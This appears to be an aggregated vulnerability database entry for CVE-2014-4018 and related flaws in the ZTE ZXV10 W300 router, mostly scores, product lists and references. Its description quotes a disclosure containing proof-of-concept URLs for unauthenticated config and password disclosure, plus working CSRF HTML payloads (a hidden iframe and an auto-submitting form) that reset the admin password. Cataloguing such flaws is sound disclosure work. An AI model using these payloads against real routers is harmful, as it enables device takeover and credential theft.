ID

VAR-201407-0352


CVE

CVE-2014-4018


TITLE

ZTE ZXV10 W300 Vulnerability to gain access rights in router firmware

Trust: 0.8

sources: JVNDB: JVNDB-2014-003362

DESCRIPTION

The ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK has a default password of admin for the admin account, which makes it easier for remote attackers to obtain access via unspecified vectors.

The ZTE WXV10 W300 is a wireless router device. The ZTE WXV10 W300 default password is vulnerable.

ZTE WXV10 W300 routers are prone to the following security vulnerabilities:

1. An insecure-default-password vulnerability.
2. Multiple information disclosure vulnerabilities.
3. A cross-site request-forgery vulnerability.

This may aid in further attacks. A remote attacker could exploit this vulnerability to gain access.

There is a disclosure in which anyone can download that file without any authentication by a simple GET request.

POC: http://192.168.1.1/rom-0

You can find the router password using my rom-0 configuration decompressor.
http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html

#3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)
---------------------------------------------------------------------

If you look at the frame source in the "Internet" tab under the "Interface Setup" you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.

    function doLoad() {
        var value = document.forms[0].wanTypeRadio[2].checked;
        doEnable();
        QosCheck();
        WANChkIdleTimeT();
        if (value)
            pppStaticCheck();
        LockWhenPVC0();
        LockPVC();
        if (document.forms[0].wan_PPPPassword != null) {
            document.forms[0].wan_PPPPassword.value = pwdppp;
        }
    }

The "pwdppp" is loaded from an external file which you can see at the bottom of the page.

    <script language="javascript" src="/basic/tc2wanfun.js"></script>

Once the user authenticates to the router, till another successful restart, the password is written in that external JS file.

POC: http://192.168.1.1/basic/tc2wanfun.js

#4| Admin Password Manipulation CSRF (CVE-2014-4155)
-----------------------------------------------------

You can change the password to blank by requesting /Forms/tools_admin_1 with a GET request containing HTTP basic authentication.

POC:

    <iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe>

If you send something like above to the victim, he will be prompted for the login and once he enters his credentials, his password will be immediately changed to a blank password. Of course, since there is no XSRF token in the request, you can change the password as you wish.

POC:

    <html>
      <body>
        <form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
          <input type="hidden" name="uiViewTools&#95;Password" value="your_passwd" />
          <input type="hidden" name="uiViewTools&#95;PasswordConfirm" value="your_passwd" />
          <script>document.exploit.submit(); </script>
        </form>
      </body>
    </html>

#5| Denial of Service
-----------------------

You can see my previous post about this vulnerability and the exploit.

https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737

Trust: 2.61

sources: NVD: CVE-2014-4018 // JVNDB: JVNDB-2014-003362 // CNVD: CNVD-2014-03842 // BID: 68082 // VULHUB: VHN-71958 // PACKETSTORM: 127129

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-03842

AFFECTED PRODUCTS

vendor: zte, model: zxv10 w300, scope: eq, version: 1.0.0a_zrd_lk

Trust: 2.4

vendor: zte, model: zxv10 w300, scope: eq, version: -

Trust: 1.0

vendor: zte, model: zxv10 w300, scope: -, version: -

Trust: 0.8

vendor: zte, model: zxv10 w300 router v1.0.0a zrd lk, scope: -, version: -

Trust: 0.6

vendor: zte, model: wxv10 w300, scope: eq, version: 0

Trust: 0.3

sources: CNVD: CNVD-2014-03842 // BID: 68082 // JVNDB: JVNDB-2014-003362 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-4018
value: HIGH

Trust: 1.0

NVD: CVE-2014-4018
value: HIGH

Trust: 0.8

CNVD: CNVD-2014-03842
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201407-360
value: HIGH

Trust: 0.6

VULHUB: VHN-71958
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2014-4018
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:N/I:C/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: COMPLETE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-03842
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-71958
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:N/I:C/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: COMPLETE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2014-03842 // VULHUB: VHN-71958 // JVNDB: JVNDB-2014-003362 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

PROBLEMTYPE DATA

problemtype:CWE-255

Trust: 1.9

sources: VULHUB: VHN-71958 // JVNDB: JVNDB-2014-003362 // NVD: CVE-2014-4018

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201407-360

TYPE

trust management

Trust: 0.6

sources: CNNVD: CNNVD-201407-360

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-003362

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-71958

PATCH

title: ZXV10 W300S, url: http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html

Trust: 0.8

title: ZTE WXV10 W300 default password vulnerability patch, url: https://www.cnvd.org.cn/patchInfo/show/46655

Trust: 0.6

sources: CNVD: CNVD-2014-03842 // JVNDB: JVNDB-2014-003362

EXTERNAL IDS

db: NVD, id: CVE-2014-4018

Trust: 3.5

db: PACKETSTORM, id: 127129

Trust: 2.4

db: EXPLOIT-DB, id: 33803

Trust: 1.7

db: BID, id: 68082

Trust: 0.9

db: JVNDB, id: JVNDB-2014-003362

Trust: 0.8

db: CNVD, id: CNVD-2014-03842

Trust: 0.6

db: CNNVD, id: CNNVD-201407-360

Trust: 0.6

db: SEEBUG, id: SSVID-86988

Trust: 0.1

db: SEEBUG, id: SSVID-89190

Trust: 0.1

db: VULHUB, id: VHN-71958

Trust: 0.1

db: EXPLOIT-DB, id: 33737

Trust: 0.1

db: OSVDB, id: 108076

Trust: 0.1

sources: CNVD: CNVD-2014-03842 // VULHUB: VHN-71958 // BID: 68082 // JVNDB: JVNDB-2014-003362 // PACKETSTORM: 127129 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

REFERENCES

url:https://osandamalith.wordpress.com/2014/06/15/zte-wxv10-w300-multiple-vulnerabilities/

Trust: 2.5

url:http://www.exploit-db.com/exploits/33803

Trust: 1.7

url:http://packetstormsecurity.com/files/127129/zte-wxv10-w300-disclosure-csrf-default.html

Trust: 1.7

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4018

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4018

Trust: 0.8

url:http://packetstormsecurity.com/files/127129/ztewxv10-defaultdisclosecsrfdos.txt

Trust: 0.6

url:http://wwwen.zte.com.cn/en/

Trust: 0.3

url:http://packetstormsecurity.com/files/127049/zte-tp-link-zynos-huawei-rom-0-configuration-decompressor.html

Trust: 0.1

url:http://192.168.1.1/basic/tc2wanfun.js

Trust: 0.1

url:http://192.168.1.1/rom-0

Trust: 0.1

url:http://packetstormsecurity.com/files/127076/zte-tp-link-rompager-denial-of-service.html

Trust: 0.1

url:http://www.osvdb.org/show/osvdb/108076

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4154

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4155

Trust: 0.1

url:https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4019

Trust: 0.1

url:http://192.168.1.1/forms/tools_admin_1

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4018

Trust: 0.1

url:http://www.exploit-db.com/exploits/33737

Trust: 0.1

sources: CNVD: CNVD-2014-03842 // VULHUB: VHN-71958 // BID: 68082 // JVNDB: JVNDB-2014-003362 // PACKETSTORM: 127129 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

CREDITS

Osanda Malith

Trust: 0.4

sources: BID: 68082 // PACKETSTORM: 127129

SOURCES

db: CNVD, id: CNVD-2014-03842
db: VULHUB, id: VHN-71958
db: BID, id: 68082
db: JVNDB, id: JVNDB-2014-003362
db: PACKETSTORM, id: 127129
db: CNNVD, id: CNNVD-201407-360
db: NVD, id: CVE-2014-4018

LAST UPDATE DATE

2024-11-23T21:55:20.066000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2014-03842, date: 2014-06-24T00:00:00
db: VULHUB, id: VHN-71958, date: 2014-07-16T00:00:00
db: BID, id: 68082, date: 2014-06-17T00:00:00
db: JVNDB, id: JVNDB-2014-003362, date: 2014-07-17T00:00:00
db: CNNVD, id: CNNVD-201407-360, date: 2014-07-17T00:00:00
db: NVD, id: CVE-2014-4018, date: 2024-11-21T02:09:20.710

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2014-03842, date: 2014-06-24T00:00:00
db: VULHUB, id: VHN-71958, date: 2014-07-16T00:00:00
db: BID, id: 68082, date: 2014-06-17T00:00:00
db: JVNDB, id: JVNDB-2014-003362, date: 2014-07-17T00:00:00
db: PACKETSTORM, id: 127129, date: 2014-06-17T23:04:35
db: CNNVD, id: CNNVD-201407-360, date: 2014-07-17T00:00:00
db: NVD, id: CVE-2014-4018, date: 2014-07-16T14:19:03.823